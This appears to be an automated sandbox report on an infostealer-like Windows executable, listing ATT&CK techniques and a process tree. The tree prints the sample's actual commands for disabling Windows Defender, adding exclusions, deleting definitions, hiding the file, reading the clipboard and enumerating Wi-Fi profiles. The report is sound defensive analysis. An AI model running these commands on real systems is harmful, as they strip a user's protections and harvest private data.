2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738

Analysis

max time kernel
95s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 12:10 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
Size

7.6MB
MD5

8bc5f4a6062d1160d5121fed028f1c60
SHA1

d93996b72f6ba8c1e3d6790807e4afb709af8777
SHA256

2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738
SHA512

14adac56bb328006c3a6a037a990433748cd6c1ee69f5c0949a33de0350f139f38cfbc0d78c21a2dfae7d0178484d94389f3cd1405009ec359fcd5b415d509d8
SSDEEP

196608:OYD+kd+wfI9jUCBB7m+mKOY7rXrZusoSDmhfvsbnTNeW0:d5HIHL7HmBYXrYSaUNy

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2168	powershell.exe
4232	powershell.exe
312	powershell.exe
4916	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4328	cmd.exe
4380	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
740	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3972	tasklist.exe
4876	tasklist.exe
2656	tasklist.exe
1416	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4176	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c86-21.dat	upx
behavioral2/memory/4084-25-0x00007FFA08200000-0x00007FFA08865000-memory.dmp	upx
behavioral2/files/0x0007000000023c79-27.dat	upx
behavioral2/files/0x0007000000023c78-41.dat	upx
behavioral2/files/0x0007000000023c80-48.dat	upx
behavioral2/files/0x0007000000023c7f-47.dat	upx
behavioral2/files/0x0007000000023c7e-46.dat	upx
behavioral2/files/0x0007000000023c7d-45.dat	upx
behavioral2/files/0x0007000000023c7c-44.dat	upx
behavioral2/files/0x0007000000023c7b-43.dat	upx
behavioral2/files/0x0007000000023c7a-42.dat	upx
behavioral2/files/0x0007000000023c8b-40.dat	upx
behavioral2/files/0x0007000000023c8a-39.dat	upx
behavioral2/files/0x0007000000023c89-38.dat	upx
behavioral2/files/0x0007000000023c85-35.dat	upx
behavioral2/files/0x0007000000023c83-34.dat	upx
behavioral2/memory/4084-32-0x00007FFA1D510000-0x00007FFA1D51F000-memory.dmp	upx
behavioral2/files/0x0007000000023c84-31.dat	upx
behavioral2/memory/4084-29-0x00007FFA1D860000-0x00007FFA1D887000-memory.dmp	upx
behavioral2/memory/4084-54-0x00007FFA17F20000-0x00007FFA17F4B000-memory.dmp	upx
behavioral2/memory/4084-58-0x00007FFA17EF0000-0x00007FFA17F15000-memory.dmp	upx
behavioral2/memory/4084-60-0x00007FFA08080000-0x00007FFA081FF000-memory.dmp	upx
behavioral2/memory/4084-56-0x00007FFA1C780000-0x00007FFA1C799000-memory.dmp	upx
behavioral2/memory/4084-62-0x00007FFA17ED0000-0x00007FFA17EE9000-memory.dmp	upx
behavioral2/memory/4084-66-0x00007FFA17A00000-0x00007FFA17A33000-memory.dmp	upx
behavioral2/memory/4084-64-0x00007FFA1D500000-0x00007FFA1D50D000-memory.dmp	upx
behavioral2/memory/4084-71-0x00007FFA17300000-0x00007FFA173CE000-memory.dmp	upx
behavioral2/memory/4084-74-0x00007FFA1D860000-0x00007FFA1D887000-memory.dmp	upx
behavioral2/memory/4084-73-0x00007FFA07B40000-0x00007FFA08073000-memory.dmp	upx
behavioral2/memory/4084-70-0x00007FFA08200000-0x00007FFA08865000-memory.dmp	upx
behavioral2/memory/4084-76-0x00007FFA17EB0000-0x00007FFA17EC4000-memory.dmp	upx
behavioral2/memory/4084-79-0x00007FFA1C830000-0x00007FFA1C83D000-memory.dmp	upx
behavioral2/memory/4084-82-0x00007FFA07A80000-0x00007FFA07B33000-memory.dmp	upx
behavioral2/memory/4084-81-0x00007FFA1C780000-0x00007FFA1C799000-memory.dmp	upx
behavioral2/memory/4084-78-0x00007FFA17F20000-0x00007FFA17F4B000-memory.dmp	upx
behavioral2/memory/4084-103-0x00007FFA17EF0000-0x00007FFA17F15000-memory.dmp	upx
behavioral2/memory/4084-109-0x00007FFA08080000-0x00007FFA081FF000-memory.dmp	upx
behavioral2/memory/4084-287-0x00007FFA17A00000-0x00007FFA17A33000-memory.dmp	upx
behavioral2/memory/4084-289-0x00007FFA17300000-0x00007FFA173CE000-memory.dmp	upx
behavioral2/memory/4084-301-0x00007FFA07B40000-0x00007FFA08073000-memory.dmp	upx
behavioral2/memory/4084-315-0x00007FFA08080000-0x00007FFA081FF000-memory.dmp	upx
behavioral2/memory/4084-323-0x00007FFA07A80000-0x00007FFA07B33000-memory.dmp	upx
behavioral2/memory/4084-309-0x00007FFA08200000-0x00007FFA08865000-memory.dmp	upx
behavioral2/memory/4084-344-0x00007FFA08200000-0x00007FFA08865000-memory.dmp	upx
behavioral2/memory/4084-429-0x00007FFA17300000-0x00007FFA173CE000-memory.dmp	upx
behavioral2/memory/4084-428-0x00007FFA17A00000-0x00007FFA17A33000-memory.dmp	upx
behavioral2/memory/4084-433-0x00007FFA07A80000-0x00007FFA07B33000-memory.dmp	upx
behavioral2/memory/4084-432-0x00007FFA1C830000-0x00007FFA1C83D000-memory.dmp	upx
behavioral2/memory/4084-431-0x00007FFA17EB0000-0x00007FFA17EC4000-memory.dmp	upx
behavioral2/memory/4084-430-0x00007FFA08200000-0x00007FFA08865000-memory.dmp	upx
behavioral2/memory/4084-427-0x00007FFA1D500000-0x00007FFA1D50D000-memory.dmp	upx
behavioral2/memory/4084-426-0x00007FFA17ED0000-0x00007FFA17EE9000-memory.dmp	upx
behavioral2/memory/4084-425-0x00007FFA08080000-0x00007FFA081FF000-memory.dmp	upx
behavioral2/memory/4084-424-0x00007FFA17EF0000-0x00007FFA17F15000-memory.dmp	upx
behavioral2/memory/4084-423-0x00007FFA1C780000-0x00007FFA1C799000-memory.dmp	upx
behavioral2/memory/4084-422-0x00007FFA17F20000-0x00007FFA17F4B000-memory.dmp	upx
behavioral2/memory/4084-421-0x00007FFA1D510000-0x00007FFA1D51F000-memory.dmp	upx
behavioral2/memory/4084-420-0x00007FFA1D860000-0x00007FFA1D887000-memory.dmp	upx
behavioral2/memory/4084-419-0x00007FFA07B40000-0x00007FFA08073000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4632	cmd.exe
4548	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2824	cmd.exe
2840	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3284	WMIC.exe
3848	WMIC.exe
4176	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4940	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4548	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4916	powershell.exe
2168	powershell.exe
2168	powershell.exe
4916	powershell.exe
4916	powershell.exe
2168	powershell.exe
4380	powershell.exe
4380	powershell.exe
4272	powershell.exe
4272	powershell.exe
4380	powershell.exe
4272	powershell.exe
4232	powershell.exe
4232	powershell.exe
2984	powershell.exe
2984	powershell.exe
312	powershell.exe
312	powershell.exe
828	powershell.exe
828	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1416	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3580	WMIC.exe
Token: SeSecurityPrivilege	3580	WMIC.exe
Token: SeTakeOwnershipPrivilege	3580	WMIC.exe
Token: SeLoadDriverPrivilege	3580	WMIC.exe
Token: SeSystemProfilePrivilege	3580	WMIC.exe
Token: SeSystemtimePrivilege	3580	WMIC.exe
Token: SeProfSingleProcessPrivilege	3580	WMIC.exe
Token: SeIncBasePriorityPrivilege	3580	WMIC.exe
Token: SeCreatePagefilePrivilege	3580	WMIC.exe
Token: SeBackupPrivilege	3580	WMIC.exe
Token: SeRestorePrivilege	3580	WMIC.exe
Token: SeShutdownPrivilege	3580	WMIC.exe
Token: SeDebugPrivilege	3580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3580	WMIC.exe
Token: SeRemoteShutdownPrivilege	3580	WMIC.exe
Token: SeUndockPrivilege	3580	WMIC.exe
Token: SeManageVolumePrivilege	3580	WMIC.exe
Token: 33	3580	WMIC.exe
Token: 34	3580	WMIC.exe
Token: 35	3580	WMIC.exe
Token: 36	3580	WMIC.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeIncreaseQuotaPrivilege	3580	WMIC.exe
Token: SeSecurityPrivilege	3580	WMIC.exe
Token: SeTakeOwnershipPrivilege	3580	WMIC.exe
Token: SeLoadDriverPrivilege	3580	WMIC.exe
Token: SeSystemProfilePrivilege	3580	WMIC.exe
Token: SeSystemtimePrivilege	3580	WMIC.exe
Token: SeProfSingleProcessPrivilege	3580	WMIC.exe
Token: SeIncBasePriorityPrivilege	3580	WMIC.exe
Token: SeCreatePagefilePrivilege	3580	WMIC.exe
Token: SeBackupPrivilege	3580	WMIC.exe
Token: SeRestorePrivilege	3580	WMIC.exe
Token: SeShutdownPrivilege	3580	WMIC.exe
Token: SeDebugPrivilege	3580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3580	WMIC.exe
Token: SeRemoteShutdownPrivilege	3580	WMIC.exe
Token: SeUndockPrivilege	3580	WMIC.exe
Token: SeManageVolumePrivilege	3580	WMIC.exe
Token: 33	3580	WMIC.exe
Token: 34	3580	WMIC.exe
Token: 35	3580	WMIC.exe
Token: 36	3580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3284	WMIC.exe
Token: SeSecurityPrivilege	3284	WMIC.exe
Token: SeTakeOwnershipPrivilege	3284	WMIC.exe
Token: SeLoadDriverPrivilege	3284	WMIC.exe
Token: SeSystemProfilePrivilege	3284	WMIC.exe
Token: SeSystemtimePrivilege	3284	WMIC.exe
Token: SeProfSingleProcessPrivilege	3284	WMIC.exe
Token: SeIncBasePriorityPrivilege	3284	WMIC.exe
Token: SeCreatePagefilePrivilege	3284	WMIC.exe
Token: SeBackupPrivilege	3284	WMIC.exe
Token: SeRestorePrivilege	3284	WMIC.exe
Token: SeShutdownPrivilege	3284	WMIC.exe
Token: SeDebugPrivilege	3284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3284	WMIC.exe
Token: SeRemoteShutdownPrivilege	3284	WMIC.exe
Token: SeUndockPrivilege	3284	WMIC.exe
Token: SeManageVolumePrivilege	3284	WMIC.exe
Token: 33	3284	WMIC.exe
Token: 34	3284	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4900 wrote to memory of 4084	4900	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	85
PID 4900 wrote to memory of 4084	4900	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	85
PID 4084 wrote to memory of 2856	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	86
PID 4084 wrote to memory of 2856	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	86
PID 4084 wrote to memory of 4476	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	87
PID 4084 wrote to memory of 4476	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	87
PID 4084 wrote to memory of 1036	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	88
PID 4084 wrote to memory of 1036	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	88
PID 4084 wrote to memory of 4332	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	92
PID 4084 wrote to memory of 4332	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	92
PID 4084 wrote to memory of 4724	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	94
PID 4084 wrote to memory of 4724	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	94
PID 4476 wrote to memory of 2168	4476	cmd.exe	96
PID 4476 wrote to memory of 2168	4476	cmd.exe	96
PID 4332 wrote to memory of 1416	4332	cmd.exe	97
PID 4332 wrote to memory of 1416	4332	cmd.exe	97
PID 1036 wrote to memory of 3008	1036	cmd.exe	98
PID 1036 wrote to memory of 3008	1036	cmd.exe	98
PID 2856 wrote to memory of 4916	2856	cmd.exe	99
PID 2856 wrote to memory of 4916	2856	cmd.exe	99
PID 4724 wrote to memory of 3580	4724	cmd.exe	100
PID 4724 wrote to memory of 3580	4724	cmd.exe	100
PID 4084 wrote to memory of 5116	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	102
PID 4084 wrote to memory of 5116	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	102
PID 5116 wrote to memory of 1660	5116	cmd.exe	104
PID 5116 wrote to memory of 1660	5116	cmd.exe	104
PID 4084 wrote to memory of 4868	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	105
PID 4084 wrote to memory of 4868	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	105
PID 4868 wrote to memory of 2176	4868	cmd.exe	107
PID 4868 wrote to memory of 2176	4868	cmd.exe	107
PID 4084 wrote to memory of 1136	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	108
PID 4084 wrote to memory of 1136	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	108
PID 1136 wrote to memory of 3284	1136	cmd.exe	110
PID 1136 wrote to memory of 3284	1136	cmd.exe	110
PID 4084 wrote to memory of 4204	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	111
PID 4084 wrote to memory of 4204	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	111
PID 4204 wrote to memory of 3848	4204	cmd.exe	113
PID 4204 wrote to memory of 3848	4204	cmd.exe	113
PID 4084 wrote to memory of 4176	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	114
PID 4084 wrote to memory of 4176	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	114
PID 4176 wrote to memory of 4592	4176	cmd.exe	116
PID 4176 wrote to memory of 4592	4176	cmd.exe	116
PID 4084 wrote to memory of 1996	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	117
PID 4084 wrote to memory of 1996	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	117
PID 4084 wrote to memory of 1712	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	119
PID 4084 wrote to memory of 1712	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	119
PID 1712 wrote to memory of 4876	1712	cmd.exe	121
PID 1712 wrote to memory of 4876	1712	cmd.exe	121
PID 1996 wrote to memory of 3972	1996	cmd.exe	122
PID 1996 wrote to memory of 3972	1996	cmd.exe	122
PID 4084 wrote to memory of 2376	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	123
PID 4084 wrote to memory of 2376	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	123
PID 4084 wrote to memory of 4328	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	124
PID 4084 wrote to memory of 4328	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	124
PID 4084 wrote to memory of 4268	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	125
PID 4084 wrote to memory of 4268	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	125
PID 4084 wrote to memory of 4672	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	128
PID 4084 wrote to memory of 4672	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	128
PID 4084 wrote to memory of 2824	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	130
PID 4084 wrote to memory of 2824	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	130
PID 4084 wrote to memory of 4316	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	133
PID 4084 wrote to memory of 4316	4084	2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe	133
PID 4672 wrote to memory of 1152	4672	cmd.exe	134
PID 4672 wrote to memory of 1152	4672	cmd.exe	134

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
"C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4900
- C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe
  "C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you have been ratted all you have left to do is cry and buy a new pc', 0, 'ratted pls just buy a new pc', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you have been ratted all you have left to do is cry and buy a new pc', 0, 'ratted pls just buy a new pc', 32+16);close()"
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2cf12e3514b0c48900dcae2000a8e10e28880cc8c7cbbb20d456aa899e864738N.exe"
      4⤵
      Views/modifies file attributes
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2376
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4268
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2824
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4316
